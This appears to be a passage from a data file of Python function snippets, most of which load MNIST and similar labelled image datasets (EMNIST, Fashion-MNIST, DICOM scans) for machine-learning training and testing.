get_data():\n\t(X_train, y_train), (X_val, y_val) = mnist.load_data()\n\tn_features = X_train.shape[1]*X_train.shape[1]\n\tn_train = X_train.shape[0]\n\tn_val = X_val.shape[0]\n\tX_train = X_train.reshape(n_train, n_features)\n\tX_val = X_val.reshape(n_val, n_features)\n\tX_train = X_train.astype(\"float32\") / 255\n\tX_val = X_val.astype(\"float32\") / 255\n\n\treturn (X_train, y_train), (X_val, y_val)", "def load_mnist(path, kind='train'):\n labels_path = os.path.join(path,'{}-labels-idx1-ubyte'.format(kind))\n images_path = os.path.join(path,'{}-images-idx3-ubyte'.format(kind))\n with open(labels_path, 'rb') as lbpath:\n magic, n = struct.unpack('>II',\n lbpath.read(8))\n labels = np.fromfile(lbpath,\n dtype=np.uint8).reshape(n)\n\n with open(images_path, 'rb') as imgpath:\n magic, num, rows, cols = struct.unpack('>IIII',\n imgpath.read(16))\n images = np.fromfile(imgpath,\n dtype=np.uint8).reshape((num,1,rows,cols))\n print(kind)\n print(\"label num:\",n)\n print(\"image num:\",num)\n print(\"image rows:\",rows)\n print(\"image cols:\",cols)\n images = images/255\n return images, labels", "def fetch_multimnist_image(label):\n dataset = MultiMNIST('./data', train=False, download=True,\n transform=transforms.ToTensor(),\n target_transform=charlist_tensor)\n images = dataset.test_data\n labels = dataset.test_labels\n n_rows = len(images)\n\n images = []\n for i in xrange(n_rows):\n image = images[i]\n text = labels[i]\n if tensor_to_string(text.squeeze(0)) == label:\n images.append(image)\n\n if len(images) == 0:\n sys.exit('No images with label (%s) found.' % label)\n\n images = torch.cat(images).cpu().numpy()\n ix = np.random.choice(np.arange(images.shape[0]))\n image = images[ix]\n image = torch.from_numpy(image).float() \n image = image.unsqueeze(0)\n return Variable(image, volatile=True)", "def read_data_sets_label(data_dir, label):\n train_data, test_data = read_data_sets(data_dir, one_hot=False)\n train_mask = create_mask(train_data, label)\n test_mask = create_mask(test_data, label)\n return (train_data.images[train_mask], test_data.images[test_mask])", "def get_mnist():\n from keras.datasets import mnist\n\n # input image dimensions\n img_rows, img_cols = 28, 28\n num_classes = 10\n # the data, shuffled and split between train and test sets\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n if K.image_data_format() == 'channels_first':\n print (\"Using Channels first\")\n x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)\n x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)\n input_shape = (1, img_rows, img_cols)\n else:\n print(\"Channels last\")\n x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)\n x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\n input_shape = (img_rows, img_cols, 1)\n\n return (x_train, y_train), (x_test, y_test)", "def load_data():\n f = gzip.open('mnist.pkl.gz', 'rb')\n training_data, validation_data, test_data = pickle.load(f, encoding=\"latin1\")\n f.close()\n \n X_train = [np.reshape(x, (784, 1)) for x in training_data[0]]\n Y_train = [vectorized_result(y) for y in training_data[1]]\n \n X_validation = [np.reshape(x, (784, 1)) for x in validation_data[0]]\n Y_validation = validation_data[1]\n \n X_test = [np.reshape(x, (784, 1)) for x in test_data[0]]\n Y_test = test_data[1]\n \n return (X_train, Y_train, X_validation, Y_validation, X_test, Y_test)", "def extract_labels(filename, num_images):\n filepath = os.path.join(WORK_DIRECTORY, filename)\n print('Extracting', filepath)\n with open(filepath, mode='rb') as bytestream:\n buf = bytestream.read(1 * num_images)\n labels = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.int64)\n return labels", "def get_mnist_data(batch=128):\n \n def transformer(data, label):\n data = data.flatten().expand_dims(0).astype(np.float32)/255\n data = data-0.13/0.31\n label = label.astype(np.float32)\n return data, label\n\n train_dataset = gluon.data.vision.datasets.MNIST(root=M5_IMAGES, train=True, transform=transformer)\n validation_dataset = gluon.data.vision.datasets.MNIST(root=M5_IMAGES, train=False, transform=transformer)\n train_dataloader = gluon.data.DataLoader(train_dataset, batch_size=batch, last_batch='keep',shuffle=True)\n validation_dataloader = gluon.data.DataLoader(validation_dataset, batch_size=batch, last_batch='keep')\n \n return train_dataloader, validation_dataloader", "def load_mnist(path, kind='train'):\n labels_path = os.path.join(path,\n '%s-labels-idx1-ubyte' % kind)\n images_path = os.path.join(path,\n '%s-images-idx3-ubyte' % kind)\n \n with open(labels_path, 'rb') as lbpath:\n magic, n = struct.unpack('>II',\n lbpath.read(8))\n labels = np.fromfile(lbpath,\n dtype=np.uint8)\n \n with open(images_path, 'rb') as imgpath:\n magic, num, rows, cols = struct.unpack(\">IIII\",\n imgpath.read(16))\n images = np.fromfile(imgpath,\n dtype=np.uint8).reshape(len(labels), 784)\n \n return images, labels", "def load_data_mnist(train_size=None):\n print \"---->\\n.....Loading MNIST data from the skdata package\"\n dataset = view.OfficialImageClassification()\n if train_size:\n train_data = {}\n validation_data = {}\n order = permutation(dataset.all_images.shape[0])\n train_data['images'] = dataset.all_images[order[:train_size]] / 256.\n train_data['labels'] = dataset.all_labels[order[:train_size]]\n validation_data['images'] = (dataset.all_images[order[train_size:]]\n / 256.)\n validation_data['labels'] = dataset.all_labels[order[train_size:]]\n else:\n train_data = {}\n validation_data = {}\n train_data['images'] = dataset.all_images / 256.\n train_data['labels'] = dataset.all_labels\n for r in train_data:\n train_data[r] = train_data[r].astype(theano.config.floatX)\n for r in validation_data:\n validation_data[r] = validation_data[r].astype(theano.config.floatX)\n print \"---->\\n.....Done!\"\n\n return train_data, validation_data", "def read_training_pixels(image_path, label_path):\n\n if io_function.is_file_exist(image_path) is False or io_function.is_file_exist(label_path) is False:\n return False\n\n # check: they are from the same polygons\n polygon_index_img = os.path.basename(image_path).split('_')[-3]\n polygon_index_label = os.path.basename(label_path).split('_')[-3]\n if polygon_index_img != polygon_index_label:\n raise ValueError(\"%s and %s are not from the same training polygons\" % (image_path, label_path))\n\n with rasterio.open(image_path) as img_obj:\n # read the all bands\n indexes = img_obj.indexes\n nbands = len(indexes)\n img_data = img_obj.read(indexes)\n\n with rasterio.open(label_path) as img_obj:\n # read the all bands (only have one band)\n indexes = img_obj.indexes\n if len(indexes) != 1:\n raise ValueError('error, the label should only have one band')\n\n label_data = img_obj.read(indexes)\n\n # check the size\n # print(img_data.shape)\n # print(label_data.shape)\n if img_data.shape[1] != label_data.shape[1] or img_data.shape[2] != label_data.shape[2]:\n raise ValueError('the image and label have different size')\n\n X_arr = img_data.reshape(nbands, -1)\n y_arr = label_data.reshape(-1)\n\n basic.outputlogMessage(str(X_arr.shape))\n basic.outputlogMessage(str(y_arr.shape))\n # sys.exit(1)\n\n return X_arr, y_arr", "def load_data():\n dirname = os.path.join('datasets', 'fashion-mnist')\n base = 'http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/'\n files = [\n 'train-labels-idx1-ubyte.gz', 'train-images-idx3-ubyte.gz',\n 't10k-labels-idx1-ubyte.gz', 't10k-images-idx3-ubyte.gz'\n ]\n\n paths = []\n for fname in files:\n paths.append(get_file(fname, origin=base + fname, cache_subdir=dirname))\n\n with gzip.open(paths[0], 'rb') as lbpath:\n y_train = np.frombuffer(lbpath.read(), np.uint8, offset=8)\n\n with gzip.open(paths[1], 'rb') as imgpath:\n x_train = np.frombuffer(\n imgpath.read(), np.uint8, offset=16).reshape(len(y_train), 28, 28)\n\n with gzip.open(paths[2], 'rb') as lbpath:\n y_test = np.frombuffer(lbpath.read(), np.uint8, offset=8)\n\n with gzip.open(paths[3], 'rb') as imgpath:\n x_test = np.frombuffer(\n imgpath.read(), np.uint8, offset=16).reshape(len(y_test), 28, 28)\n\n return (x_train, y_train), (x_test, y_test)", "def load_data():\n # Load image data from MNIST.\n (train_x, train_y),(eval_x, eval_y) = keras.datasets.mnist.load_data()\n\n # We convert the input data to (60000, 28, 28, 1), float32 and normalize our data values to the range [0, 1].\n train_x = train_x.reshape(train_x.shape[0], train_x.shape[1], train_x.shape[2], 1)\n eval_x = eval_x.reshape(eval_x.shape[0], eval_x.shape[1], eval_x.shape[2], 1)\n\n train_x = train_x.astype('float32')\n eval_x = eval_x.astype('float32')\n train_x /= 255\n eval_x /= 255\n\n # Preprocess class labels \n train_y = train_y.astype(np.int32)\n eval_y = eval_y.astype(np.int32)\n\n train_y = np_utils.to_categorical(train_y, 10)\n eval_y = np_utils.to_categorical(eval_y, 10)\n\n return train_x, train_y, eval_x, eval_y", "def extract_labels(filename):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n magic = _read32(bytestream)\n if magic != 2049:\n raise ValueError(\n 'Invalid magic number %d in MNIST label file: %s' %\n (magic, filename))\n num_items = _read32(bytestream)\n buf = bytestream.read(num_items)\n labels = np.frombuffer(buf, dtype=np.uint8)\n return dense_to_one_hot(labels)", "def extract_labels(filename, num_images):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(8)\n buf = bytestream.read(1 * num_images)\n labels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64)\n return labels", "def extract_labels(filename, num_images):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(8)\n buf = bytestream.read(1 * num_images)\n labels = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.int64)\n return labels", "def get_images(image_folder_root, image_label_list):\n file_dcm=[]\n X = []\n y = []\n for file_name,label in image_label_list:\n try:\n current_file = pydicom.dcmread(image_folder_root + file_name + '.dcm')\n pixel_array = current_file.pixel_array\n if (pixel_array.shape != (512,512)):\n continue\n file_dcm.append((file_name,label,brain_window(current_file)))\n y.append(label)\n X.append(pydicom.dcmread(image_folder_root + file_name + '.dcm').pixel_array)\n except ValueError:\n continue\n return X,y", "def get_images(image_folder_root, image_label_list):\n file_dcm=[]\n X_test = []\n y_test = []\n for file_name,label in image_label_list:\n try:\n current_file = pydicom.dcmread(image_folder_root + file_name + '.dcm')\n pixel_array = current_file.pixel_array\n if (pixel_array.shape != (512,512)):\n continue\n file_dcm.append((file_name,label,brain_window(current_file)))\n y_test.append(label)\n X_test.append(pydicom.dcmread(image_folder_root + file_name + '.dcm').pixel_array)\n except ValueError:\n continue\n return X_test,y_test", "def load_data():\n prefix = 'mnist_data/'\n train_data = np.load(prefix + 'mnist_train_images.npy')\n train_labels = np.load(prefix + 'mnist_train_labels.npy')\n val_data = np.load(prefix + 'mnist_validation_images.npy')\n val_labels = np.load(prefix + 'mnist_validation_labels.npy')\n test_data = np.load(prefix + 'mnist_test_images.npy')\n test_labels = np.load(prefix + 'mnist_test_labels.npy')\n assert train_data.shape == (55000, 784) and train_labels.shape == (55000, 10)\n assert val_data.shape == (5000, 784) and val_labels.shape == (5000, 10)\n assert test_data.shape == (10000, 784) and test_labels.shape == (10000, 10)\n return train_data, train_labels, val_data, val_labels, test_data, test_labels", "def mnist(path=None):\r\n url = 'http://yann.lecun.com/exdb/mnist/'\r\n files = ['train-images-idx3-ubyte.gz',\r\n 'train-labels-idx1-ubyte.gz',\r\n 't10k-images-idx3-ubyte.gz',\r\n 't10k-labels-idx1-ubyte.gz']\r\n\r\n if path is None:\r\n # Set path to /home/USER/data/mnist or C:\\Users\\USER\\data\\mnist\r\n path = os.path.join(os.path.expanduser('~'), 'data', 'mnist')\r\n\r\n # Create path if it doesn't exist\r\n os.makedirs(path, exist_ok=True)\r\n\r\n # Download any missing files\r\n for file in files:\r\n if file not in os.listdir(path):\r\n urlretrieve(url + file, os.path.join(path, file))\r\n print(\"Downloaded %s to %s\" % (file, path))\r\n\r\n def _images(path):\r\n \"\"\"Return images loaded locally.\"\"\"\r\n with gzip.open(path) as f:\r\n # First 16 bytes are magic_number, n_imgs, n_rows, n_cols\r\n pixels = np.frombuffer(f.read(), 'B', offset=16)\r\n return pixels.reshape(-1, 784).astype('float32') / 255\r\n\r\n def _labels(path):\r\n \"\"\"Return labels loaded locally.\"\"\"\r\n with gzip.open(path) as f:\r\n # First 8 bytes are magic_number, n_labels\r\n integer_labels = np.frombuffer(f.read(), 'B', offset=8)\r\n\r\n def _onehot(integer_labels):\r\n \"\"\"Return matrix whose rows are onehot encodings of integers.\"\"\"\r\n n_rows = len(integer_labels)\r\n n_cols = integer_labels.max() + 1\r\n onehot = np.zeros((n_rows, n_cols), dtype='uint8')\r\n onehot[np.arange(n_rows), integer_labels] = 1\r\n return onehot\r\n\r\n return _onehot(integer_labels)\r\n\r\n train_images = _images(os.path.join(path, files[0]))\r\n train_labels = _labels(os.path.join(path, files[1]))\r\n test_images = _images(os.path.join(path, files[2]))\r\n test_labels = _labels(os.path.join(path, files[3]))\r\n\r\n return train_images, train_labels, test_images, test_labels", "def read(dataset = \"training\", path = \".\"):\n\n if dataset is \"training\":\n fname_img = os.path.join(path, 'train-images.idx3-ubyte')\n fname_lbl = os.path.join(path, 'train-labels.idx1-ubyte')\n elif dataset is \"testing\":\n fname_img = os.path.join(path, 't10k-images.idx3-ubyte')\n fname_lbl = os.path.join(path, 't10k-labels.idx1-ubyte')\n else:\n raise ValueError(\"dataset must be 'testing' or 'training'\")\n\n # Load everything in some numpy arrays\n with open(fname_lbl, 'rb') as flbl:\n magic, num = struct.unpack(\">II\", flbl.read(8))\n lbl = np.fromfile(flbl, dtype=np.int8)\n\n with open(fname_img, 'rb') as fimg:\n magic, num, rows, cols = struct.unpack(\">IIII\", fimg.read(16))\n img = np.fromfile(fimg, dtype=np.uint8).reshape(len(lbl), rows, cols)\n\n get_img = lambda idx: (lbl[idx], img[idx])\n\n # Create an iterator which returns each image in turn\n for i in range(len(lbl)):\n yield get_img(i)", "def load_data():\n\n training_files_dir = \"digits/trainingDigits\"\n training_files = os.listdir(training_files_dir)\n file_num = len(training_files)\n hw_labels = []\n\n training_mat = zeros((file_num, 32 * 32))\n for i in xrange(file_num):\n filename = training_files[i]\n file_label = int((filename.split(\".\")[0]).split(\"_\")[0])\n hw_labels.append(file_label)\n training_mat[i, :] = img2vector(training_files_dir + '/' + filename)\n\n return training_mat, hw_labels", "def load_mnist(path, kind='train'):\n\tlabels_path = os.path.join(path,'%s-labels.idx1-ubyte'%kind)\n\timages_path = os.path.join(path,'%s-images.idx3-ubyte'%kind)\n\t\n\twith open(labels_path, 'rb') as lbpath:\n\t\tmagic, n = struct.unpack('>II', lbpath.read(8))\n\t\tlabels = np.fromfile(lbpath, dtype=np.uint8)\n\t\t\n\twith open(images_path, 'rb') as imgpath:\n\t\tmagic, num, row, cols = struct.unpack('>IIII', imgpath.read(16))\n\t\timages = np.fromfile(imgpath, dtype=np.uint8).reshape(len(labels), 784)\n\t\n\treturn images, labels", "def extract_labels(filename, num_images):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(8)\n buf = bytestream.read(1 * num_images)\n labels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64)\n return labels", "def extract_labels(filename, num_images):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(8)\n buf = bytestream.read(1 * num_images)\n labels = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.int64)\n return labels", "def load_data(self) -> tuple:\n label_num = {}\n data_set = pathlib.Path(self.path)\n data = []\n\n # create the label lookup dict for verifcation later\n for i, v in enumerate(data_set.iterdir()):\n label_num[v.name] = i\n self.labels[i] = v.name\n # end\n\n # read images\n for img_path in data_set.rglob(\"*.jpg\"):\n lbl = label_num[str(img_path.parent.stem)]\n img = cv2.imread(str(img_path))\n img = cv2.resize(img, self.dims, interpolation=cv2.INTER_AREA)\n\n # flatten RGB data into a vector\n # NOTE: NOT ACTUALLY NECESSARY! \n img.flatten()\n\n # label the sample and append to temp data list\n sample = np.append(lbl, img)\n data.append(sample)\n # end\n\n # partition and package the data (*_ ensures safe unpacking)\n train, test, validate, *_ = Data.partition(data, self.parts, 0.7, 0.2)\n self.train = Data(train)\n self.test = Data(test)\n self.validate = Data(validate)", "def load_EMNIST_data(file, verbose = False, standarized = False): \n mat = sio.loadmat(file)\n data = mat[\"dataset\"]\n \n X_train = data['train'][0,0]['images'][0,0]\n X_train = X_train.reshape((X_train.shape[0], 28, 28), order = \"F\")\n y_train = data['train'][0,0]['labels'][0,0]\n y_train = np.squeeze(y_train)\n y_train -= 1 #y_train is zero-based\n \n X_test = data['test'][0,0]['images'][0,0]\n X_test= X_test.reshape((X_test.shape[0], 28, 28), order = \"F\")\n y_test = data['test'][0,0]['labels'][0,0]\n y_test = np.squeeze(y_test)\n y_test -= 1 #y_test is zero-based\n \n if standarized: \n X_train = X_train/255\n X_test = X_test/255\n mean_image = np.mean(X_train, axis=0)\n X_train -= mean_image\n X_test -= mean_image\n \n\n if verbose == True: \n print(\"EMNIST-letter dataset ... \")\n print(\"X_train shape :\", X_train.shape)\n print(\"X_test shape :\", X_test.shape)\n print(\"y_train shape :\", y_train.shape)\n print(\"y_test shape :\", y_test.shape)\n \n return X_train, y_train, X_test, y_test", "def _load_images_and_labels(image_dir):\n\n print('Extracting images from: ', image_dir)\n\n image_paths = _load_image_paths(image_dir)\n images = _extract_images(image_paths)\n num_images = len(image_paths)\n labels = np.ones(num_images, dtype=np.int64)\n\n return images, labels", "def readData():\n\tN = 800\n\tD = 28*28\n\tX = np.zeros((N, D), dtype=np.uint8)\n\n\tf = open(\"data/a012_images.dat\", 'rb')\n\n\tfor i in range(0, N):\n\t\tX[i, :] = np.fromstring(f.read(D), dtype='uint8')\n\n\tf.close()\n\n\treturn X", "def extract_labels(filename, num_images):\n\n# this function definition has been taken from internet \n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(8)\n buf = bytestream.read(1 * num_images)\n labels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64) #Interpret a buffer as a 1-dimensional array\n return labels", "def load_mnist(path, kind='train'):\n labels_path = os.path.join(path,\n '%s-labels-idx1-ubyte.gz'\n % kind)\n images_path = os.path.join(path,\n '%s-images-idx3-ubyte.gz'\n % kind)\n\n with gzip.open(labels_path, 'rb') as lbpath:\n labels = np.frombuffer(lbpath.read(), dtype=np.uint8,\n offset=8)\n\n with gzip.open(images_path, 'rb') as imgpath:\n images = np.frombuffer(imgpath.read(), dtype=np.uint8,\n offset=16).reshape(len(labels), 784)\n\n return images, labels", "def load_mnist(path, kind='train'):\n\n labels_path = os.path.join(path,\n '%s-labels-idx1-ubyte.gz'\n % kind)\n images_path = os.path.join(path,\n '%s-images-idx3-ubyte.gz'\n % kind)\n\n with gzip.open(labels_path, 'rb') as lbpath:\n labels = np.frombuffer(lbpath.read(), dtype=np.uint8,\n offset=8)\n\n with gzip.open(images_path, 'rb') as imgpath:\n images = np.frombuffer(imgpath.read(), dtype=np.uint8,\n offset=16).reshape(len(labels), 784)\n\n return images, labels", "def load_data(filename):\n emnist = loadmat(filename)\n\n # Load training images and labels\n train_images_unshuffled = emnist['train_images']\n train_labels_unshuffled = emnist['train_labels']\n\n # Combine labels and training data\n combined_training = np.hstack((train_images_unshuffled, train_labels_unshuffled))\n\n # Shuffle data\n np.random.shuffle(combined_training)\n\n # Seperate into data and labels\n # Split into training and validation sets\n train_images = combined_training[:20800,:-1] / 255 # Normalize data, values are now between 0 and 1\n train_labels = combined_training[:20800,-1][...,None] # Turns back into column vector\n validation_images = combined_training[20800:,:-1] / 255 # Normalize data, values are now between 0 and 1\n validation_labels = combined_training[20800:,-1][...,None] # Turns back into column vector\n\n # Load training images and labels\n test_images = emnist['test_images'] / 255 # Normalize data, values are now between 0 and 1\n test_labels = emnist['test_labels']\n\n return train_images, train_labels, test_images, test_labels, validation_images, validation_labels", "def load_test_data():\n X = []\n y = []\n for fname in os.listdir(test_dir):\n label = int(fname.split(\"_\")[0])\n img = plt.imread(os.path.join(test_dir, fname))\n X.append(img)\n y.append(label)\n X = np.stack(X)\n y = np.stack(y)\n return X, y", "def load_labeled_data():\n\n images = []\n labels = []\n\n for i in range(1, 10):\n path = (\"selflabeled\", str(i), \"*.jpg\")\n filenames = glob.glob(\"/\".join(path))\n images_one_type = [cv2.imread(img) for img in filenames]\n labels_one_type = [i] * len(images_one_type)\n images += images_one_type\n labels += labels_one_type\n\n return images, labels", "def iam_data_generator() -> tuple(npt.ArrayLike, str):\n \n with open(DATA_PATH) as iam:\n for line in iam:\n if not line.startswith('#'):\n im_path, word = parse_line(line)\n image = cv2.imread(im_path, cv2.IMREAD_GRAYSCALE)\n image = resize_image(image, IMG_SIZE)\n yield image, word", "def extract_images(filename,lx):\n print('Extracting', filename,'aaaaaa')\n \n data=numpy.loadtxt(filename,dtype='int64')\n dim=data.shape[0]\n data=data.reshape(dim, lx, lx, 1) \n # Convert shape from [num examples, rows, columns, depth]\n # to [num examples, rows*columns] (assuming depth == 1)\n data = data.reshape(data.shape[0],\n data.shape[1] * data.shape[2])\n # Convert from [0, 255] -> [0.0, 1.0].\n data = data.astype(numpy.float64)\n # images = numpy.multiply(images, 1.0 / 255.0) # commented since it is ising variables\n data = numpy.multiply(data, 1.0 ) # multiply by one, instead\n print(data.shape)\n return data", "def mnist_load_data(filename):\n if os.path.isfile(filename):\n mnist_file = open(filename, 'rb')\n train_set, valid_set, test_set = pickle.load(mnist_file)\n return train_set, valid_set, test_set\n else:\n print('Failed to find data file %s' % (filename))\n return None", "def _extract_labels(self, filename, one_hot=False):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n magic = self._read32(bytestream)\n if magic != 2049:\n raise ValueError(\n 'Invalid magic number %d in MNIST label file: %s' %\n (magic, filename))\n num_items = self._read32(bytestream)\n buf = bytestream.read(num_items)\n labels = np.frombuffer(buf, dtype=np.uint8)\n if one_hot:\n return self._dense_to_one_hot(labels)\n return labels", "def load_mnist (images_fn_gz, labels_fn_gz, digits=None, path=None, asbytes=False, selection=None, return_labels=True, return_indices=False):\n\n # We can skip the labels file only if digits aren't specified and labels aren't asked for\n if return_labels or digits is not None:\n flbl = gzip.open (labels_fn_gz, 'rb')\n magic_nr, size = struct.unpack(\">II\", flbl.read(8))\n labels_raw = pyarray(\"b\", flbl.read())\n flbl.close()\n\n fimg = gzip.open(images_fn_gz, 'rb')\n magic_nr, size, rows, cols = struct.unpack(\">IIII\", fimg.read(16))\n images_raw = pyarray(\"B\", fimg.read())\n fimg.close()\n\n if digits:\n indices = [k for k in range(size) if labels_raw[k] in digits]\n else:\n indices = range(size)\n\n if selection:\n indices = indices[selection] \n N = len(indices)\n\n images = zeros((N, rows, cols), dtype=uint8)\n\n if return_labels:\n labels = zeros((N), dtype=int8)\n for i, index in enumerate(indices):\n images[i] = array(images_raw[ indices[i]*rows*cols : (indices[i]+1)*rows*cols ]).reshape((rows, cols))\n if return_labels:\n labels[i] = labels_raw[indices[i]]\n\n if not asbytes:\n images = images.astype(float)/255.0\n\n ret = (images,)\n if return_labels:\n ret += (labels,)\n if return_indices:\n ret += (indices,)\n if len(ret) == 1:\n return ret[0] # Don't return a tuple of one\n else:\n return ret", "def read_labeled_image_list(image_list_file):\n f = open(image_list_file, 'r')\n filenames = []\n labels = []\n for line in f:\n filename, label = line[:-1].split(' ')\n filenames.append(filename)\n labels.append(int(label))\n return filenames, labels", "def get_train_data(trainlist):\n if not os.path.exists(trainlist):\n raise ValueError('Train data is not exist.')\n\n images = []\n labels = []\n count = 0\n lines = open(trainlist, 'r')\n lines = list(lines)\n for line in lines:\n image_file, label = line.strip('\\n').split('::')\n count += 1\n if count % 100 == 0:\n print('Load {} images.'.format(count))\n image = cv2.imread(image_file)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n images.append(image)\n labels.append(label)\n images = np.array(images)\n labels = np.array(labels)\n return images, labels", "def load_MNIST(filename_train='train.csv', filename_test='test.csv'):\n # Load training data\n reader = csv.reader(open(filename_train,\"rb\"), delimiter=',')\n reader.next()\n x = list(reader)\n\n xs = []\n ys = []\n for i in xrange(len(x)):\n ys.append([x[i][0]])\n xs.append(x[i][1:])\n Xtr = numpy.array(xs)\n Ytr = numpy.array(ys)\n\n # Load test data\n reader = csv.reader(open(filename,test,\"rb\"), delimiter=',')\n reader.next()\n x = list(reader)\n xs = []\n ys = []\n for i in xrange(len(x)):\n ys.append([x[i][0]])\n xs.append(x[i][1:])\n Xte = numpy.array(xs)\n Yte = numpy.array(ys)\n\n return Xtr,Ytr,Xte,Yte", "def read_labeled_image_list(image_list_file):\n\tf = open(image_list_file, 'r')\n\tfilenames = []\n\tlabels = []\n\tfor line in f:\n\t\tline = line.rstrip('\\n')\n\n\t\tfilename, _, label = line.partition(LABEL_SEP)#line[:-1].split(LABEL_SEP)\n\t\tfilenames.append(filename)\n\t\tlabels.append(int(label))\n\t\t#print (filename+LABEL_SEP+\":) \"+label)\n\treturn filenames, labels", "def get_inputs(mode, batch_size=64):\n # Get the base dataset\n if mode == 'train':\n dataset = ds.train('/tmp/mnist_data')\n elif mode in {'eval', 'predict', 'infer'}:\n dataset = ds.test('/tmp/mnist_data')\n else:\n raise ValueError(\n 'mode must be one of {\"train\", \"eval\", \"predict\", \"infer\"}')\n\n # repeat and shuffle if training\n if mode == 'train':\n dataset = dataset.repeat() # repeat indefinitely\n dataset = dataset.shuffle(buffer_size=10000)\n\n dataset = dataset.batch(batch_size)\n\n image, labels = dataset.make_one_shot_iterator().get_next()\n image = tf.reshape(image, (-1, 28, 28, 1))\n return image, labels", "def read_data_sets(data_dir, one_hot=True):\n data = mnist.input_data.read_data_sets(data_dir, one_hot=one_hot)\n return (data.train, data.test)", "def _load_images_labels(self):\n path_dataset_file = self.path_model_id.joinpath(f'{self.set_name}_set.csv')\n \n with path_dataset_file.open(mode='r', newline='') as f:\n csv_reader = reader(f, delimiter=',')\n rows = list(csv_reader)\n\n if self.shuffle:\n rng = default_rng(self.seed)\n rng.shuffle(rows)\n \n self.n_examples = len(rows)\n\n ds_files = tf.data.Dataset.from_tensor_slices(\n [path.join(str(self.path_data), f'label_{row[1]}', row[0])\n for row in rows])\n \n ds_images = ds_files.map(self._load_preprocess_image)\n\n class_labels_enc = self.class_le.fit_transform(\n [row[1] for row in rows])\n\n ds_labels = tf.data.Dataset.from_tensor_slices(\n class_labels_enc)\n\n return ds_images, ds_labels", "def load_image_data():\n print(\"Loading image data...\")\n label_dict = get_label_vectors()\n categories = [c for c in os.listdir('images/') if c[0] != '.'] # ignore\n labels = [] # instantiate list for image labels\n data = [] # instantiate list for image data\n for i in categories:\n path = 'images/{}/'.format(i) # define path to category folder\n for j in os.listdir(path): # get images from category folder\n labels.append(label_dict[i]) # append label vector\n data.append(cv2.imread(path + j).flatten()) # append flattened image data\n\n labels = np.array(labels) # convert lists to array\n data = np.array(data)\n print(\"Done.\")\n\n return labels, data", "def fetch_mnist():\n data_path = check_fetch_mnist()\n f = gzip.open(data_path, 'rb')\n try:\n train_set, valid_set, test_set = pickle.load(f, encoding=\"latin1\")\n except TypeError:\n train_set, valid_set, test_set = pickle.load(f)\n f.close()\n train_indices = np.arange(0, len(train_set[0]))\n valid_indices = np.arange(0, len(valid_set[0])) + train_indices[-1] + 1\n test_indices = np.arange(0, len(test_set[0])) + valid_indices[-1] + 1\n return {\"data\": np.concatenate((train_set[0], valid_set[0], test_set[0]),\n axis=0).astype(theano.config.floatX),\n \"target\": np.concatenate((train_set[1], valid_set[1], test_set[1]),\n axis=0).astype(np.int32),\n \"train_indices\": train_indices.astype(np.int32),\n \"valid_indices\": valid_indices.astype(np.int32),\n \"test_indices\": test_indices.astype(np.int32)}", "def extract_labels(filename, one_hot=False):\n\tprint('Extracting', filename)\n\twith gzip.open(filename) as bytestream:\n\t\tmagic = _read32(bytestream)\n\t\tif magic != 2049:\n\t\t\traise ValueError('Invalid magic number %d in MNIST label file: %s' %(magic, filename))\n\t\tnum_items = _read32(bytestream)\n\t\tbuf = bytestream.read(num_items)\n\t\tlabels = numpy.frombuffer(buf, dtype=numpy.uint8)\n\t\tif one_hot:\n\t\t\treturn dense_to_one_hot(labels)\n\t\treturn labels", "def load_data(fname):\n pathname = \"data/\" + fname\n data = pickle.load(open(pathname, 'rb'), encoding='latin1')\n images = np.array([img[:-1] for img in data])\n ys = [int(img[-1]) for img in data]\n length = len(ys)\n labels = np.zeros((length, 10))\n\n for i in range(length):\n labels[i, ys[i]] = 1\n\n return images, labels", "def read_picture_data(filename):\n file_name = os.path.join('.', 'datas', filename)\n\n try:\n with open(file_name, 'rb') as file:\n read_data = file.read()\n except FileNotFoundError:\n print(f'Oups, the file {filename} was not found')\n\n try:\n if filename == 'train-images.idx3-ubyte':\n number_of_pics = 60000\n else:\n number_of_pics = 10000\n except LookupError:\n print(f'Oups, the file {filename} was not named as a MNist file')\n\n picture_data = np.zeros((number_of_pics, 28 * 28)) # 28*28 = 784\n\n s = 0\n for n in range(16, number_of_pics * 784, 784): # 16 header bytes being dumped\n for t, byte in enumerate(read_data[n: n + 784]):\n picture_data[s, t] = byte\n s += 1\n\n print(f'\\nPicture data read from {filename}\\n')\n\n return picture_data", "def load_data():\r\n\r\n mnist_file = gzip.open('../data/mnist.pkl.gz', 'rb')\r\n ## opening the gz archive file by using gzip's open function\r\n\r\n training_data, validation_data, test_data = cPickle.load(mnist_file, encoding='latin1')\r\n ## loading the training, validation and test data by using cPickle's load function\r\n ## passing encoding parameter as ``latin1``\r\n\r\n mnist_file.close()\r\n ## closing the mnist_file\r\n\r\n return (training_data, validation_data, test_data)", "def extract_labels(filename, one_hot=False):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n magic = _read32(bytestream)\n if magic != 2049:\n raise ValueError(\n 'Invalid magic number %d in MNIST label file: %s' %\n (magic, filename))\n num_items = _read32(bytestream)[0]\n #print('check', magic, num_items)\n buf = bytestream.read(num_items)\n labels = numpy.frombuffer(buf, dtype=numpy.uint8)\n if one_hot:\n return dense_to_one_hot(labels)\n return labels", "def get_raw_data():\n\twith open('train_label.pkl', 'rb') as f:\n\t\ttrain_label = pickle.load(f)\n\n\twith 